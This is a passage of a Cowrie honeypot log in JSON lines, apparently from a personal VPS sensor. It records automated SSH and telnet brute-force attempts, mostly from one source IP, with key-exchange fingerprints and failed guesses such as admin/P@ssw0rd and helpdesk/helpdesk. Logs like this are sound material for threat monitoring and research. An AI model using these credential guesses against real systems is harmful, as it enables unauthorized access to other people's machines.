","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:29.402257Z","src_ip":"212.227.235.229","session":"ac784f6052dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45574,"dst_ip":"1.2.3.4","dst_port":22,"session":"024eac5ea026","protocol":"ssh","message":"New connection: 212.227.235.229:45574 (1.2.3.4:22) [session: 024eac5ea026]","sensor":"my-vps","timestamp":"2025-08-28T08:04:30.690377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:30.714807Z","src_ip":"212.227.235.229","session":"024eac5ea026"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:30.938364Z","src_ip":"212.227.235.229","session":"024eac5ea026"}
{"eventid":"cowrie.login.failed","username":"helpdesk","password":"helpdesk","message":"login attempt [helpdesk/helpdesk] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:31.249603Z","src_ip":"212.227.235.229","session":"ac784f6052dd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"andrew","message":"login attempt [admin/andrew] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:32.345895Z","src_ip":"212.227.235.229","session":"024eac5ea026"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:32.501275Z","src_ip":"212.227.235.229","session":"ac784f6052dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36746,"dst_ip":"1.2.3.4","dst_port":22,"session":"710e65cc7e68","protocol":"ssh","message":"New connection: 212.227.235.229:36746 (1.2.3.4:22) [session: 710e65cc7e68]","sensor":"my-vps","timestamp":"2025-08-28T08:04:33.058255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:33.059414Z","src_ip":"212.227.235.229","session":"710e65cc7e68"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:33.317626Z","src_ip":"212.227.235.229","session":"710e65cc7e68"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:33.936325Z","src_ip":"212.227.235.229","session":"024eac5ea026"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:34.395325Z","src_ip":"212.227.235.229","session":"710e65cc7e68"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:35.710859Z","src_ip":"212.227.235.229","session":"710e65cc7e68"}
{"eventid":"cowrie.session.closed","duration":"111.9","message":"Connection lost after 111.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:42.925621Z","src_ip":"212.227.235.229","session":"7dc1296ddc46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42568,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d58ef6adb2","protocol":"ssh","message":"New connection: 212.227.235.229:42568 (1.2.3.4:22) [session: 62d58ef6adb2]","sensor":"my-vps","timestamp":"2025-08-28T08:04:50.208794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:50.209741Z","src_ip":"212.227.235.229","session":"62d58ef6adb2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:50.485565Z","src_ip":"212.227.235.229","session":"62d58ef6adb2"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:51.574721Z","src_ip":"212.227.235.229","session":"62d58ef6adb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39246,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb481a558bc2","protocol":"ssh","message":"New connection: 212.227.235.229:39246 (1.2.3.4:22) [session: cb481a558bc2]","sensor":"my-vps","timestamp":"2025-08-28T08:04:51.964293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:51.975937Z","src_ip":"212.227.235.229","session":"cb481a558bc2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:52.237477Z","src_ip":"212.227.235.229","session":"cb481a558bc2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:52.918018Z","src_ip":"212.227.235.229","session":"62d58ef6adb2"}
{"eventid":"cowrie.login.failed","username":"anton","password":"anton","message":"login attempt [anton/anton] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:53.352936Z","src_ip":"212.227.235.229","session":"cb481a558bc2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:54.666395Z","src_ip":"212.227.235.229","session":"cb481a558bc2"}
{"eventid":"cowrie.session.connect","src_ip":"125.137.76.226","src_port":50915,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ad2230353de","protocol":"telnet","message":"New connection: 125.137.76.226:50915 (1.2.3.4:23) [session: 0ad2230353de]","sensor":"my-vps","timestamp":"2025-08-28T08:04:55.781201Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42570,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5c51a6ba411","protocol":"ssh","message":"New connection: 212.227.235.229:42570 (1.2.3.4:22) [session: e5c51a6ba411]","sensor":"my-vps","timestamp":"2025-08-28T08:04:57.788805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:57.789752Z","src_ip":"212.227.235.229","session":"e5c51a6ba411"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:58.041313Z","src_ip":"212.227.235.229","session":"e5c51a6ba411"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwertyuiop","message":"login attempt [admin/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:00.373406Z","src_ip":"212.227.235.229","session":"e5c51a6ba411"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:02.367350Z","src_ip":"212.227.235.229","session":"e5c51a6ba411"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34006,"dst_ip":"1.2.3.4","dst_port":22,"session":"05f18d182b70","protocol":"ssh","message":"New connection: 212.227.235.229:34006 (1.2.3.4:22) [session: 05f18d182b70]","sensor":"my-vps","timestamp":"2025-08-28T08:05:19.371870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:19.374395Z","src_ip":"212.227.235.229","session":"05f18d182b70"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","s